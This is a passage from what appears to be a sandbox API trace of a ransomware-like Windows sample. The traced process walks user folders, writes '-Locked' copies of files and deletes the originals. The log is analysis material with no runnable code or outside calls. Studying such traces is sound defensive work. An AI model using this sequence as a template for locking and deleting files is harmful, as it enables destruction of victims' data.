nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0301.967] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af04c) returned 1 [0301.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af058) returned 1 [0301.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af08c) returned 1 [0301.968] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x1aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0301.968] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", nBufferLength=0x105, lpBuffer=0x1aeb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", lpFilePart=0x0) returned 0x2f [0301.968] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*", lpFindFileData=0x1aedb4 | out: lpFindFileData=0x1aedb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc2dcd, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.969] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc2dcd, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.969] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b315521, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc2dcd, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat", cAlternateFileName="CALEND~1.DAT")) returned 1 [0301.969] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b315521, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc2dcd, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat", cAlternateFileName="CALEND~1.DAT")) returned 0 [0301.969] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af04c) returned 1 [0301.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af058) returned 1 [0301.970] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked", nBufferLength=0x105, lpBuffer=0x1aea44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked", lpFilePart=0x0) returned 0x47 [0301.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef38) returned 1 [0301.970] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\calendarcache.dat-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.971] GetFileType (hFile=0x49c) returned 0x1 [0301.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef34) returned 1 [0301.971] GetFileType (hFile=0x49c) returned 0x1 [0301.973] CloseHandle (hObject=0x49c) returned 1 [0301.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat", nBufferLength=0x105, lpBuffer=0x1aebc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat", lpFilePart=0x0) returned 0x40 [0301.974] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\calendarcache.dat")) returned 1 [0301.975] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x1aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0301.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af064) returned 1 [0301.975] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp"), fInfoLevelId=0x0, lpFileInformation=0x1af0e4 | out: lpFileInformation=0x1af0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0301.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af060) returned 1 [0301.975] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp")) returned 0 [0301.976] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0301.976] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0301.976] CoTaskMemFree (pv=0x73f0b8) [0301.978] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x1aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0301.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0ac) returned 1 [0301.978] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms"), fInfoLevelId=0x0, lpFileInformation=0x1af12c | out: lpFileInformation=0x1af12c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x241f3052, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0301.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a8) returned 1 [0301.979] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms")) returned 0 [0301.979] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0301.979] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0301.980] CoTaskMemFree (pv=0x73f0b8) [0301.982] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0301.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0301.982] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0301.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0301.982] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0 [0301.983] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0301.983] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0301.983] CoTaskMemFree (pv=0x73f0b8) [0301.985] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Application Data", lpFilePart=0x0) returned 0x26 [0301.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.985] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Application Data", lpFilePart=0x0) returned 0x26 [0301.985] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Application Data\\", lpFilePart=0x0) returned 0x27 [0301.985] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0301.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0301.988] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpFilePart=0x0) returned 0x1e [0301.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.988] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpFilePart=0x0) returned 0x1e [0301.988] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", lpFilePart=0x0) returned 0x1f [0301.988] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0301.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0301.989] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0301.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0301.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.990] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpFilePart=0x0) returned 0x1e [0301.990] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", lpFilePart=0x0) returned 0x1f [0301.990] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0301.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0301.991] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0301.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0301.991] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0301.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0301.991] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.992] GetFileType (hFile=0x49c) returned 0x1 [0301.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0301.992] GetFileType (hFile=0x49c) returned 0x1 [0301.994] CloseHandle (hObject=0x49c) returned 1 [0301.995] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini", lpFilePart=0x0) returned 0x2a [0301.995] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini")) returned 1 [0301.996] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Cookies", lpFilePart=0x0) returned 0x1d [0301.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.996] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Cookies", lpFilePart=0x0) returned 0x1d [0301.996] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Cookies\\", lpFilePart=0x0) returned 0x1e [0301.996] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Cookies\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0301.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0301.999] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0301.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.999] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0301.999] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0301.999] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32df1a0f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df1a0f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.030] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32df1a0f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df1a0f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.030] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32dda7fe, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32dda7fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32dda7fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0302.030] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32de91de, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32de91de, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32de91de, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0302.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0302.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df54d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0302.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0302.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0302.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, 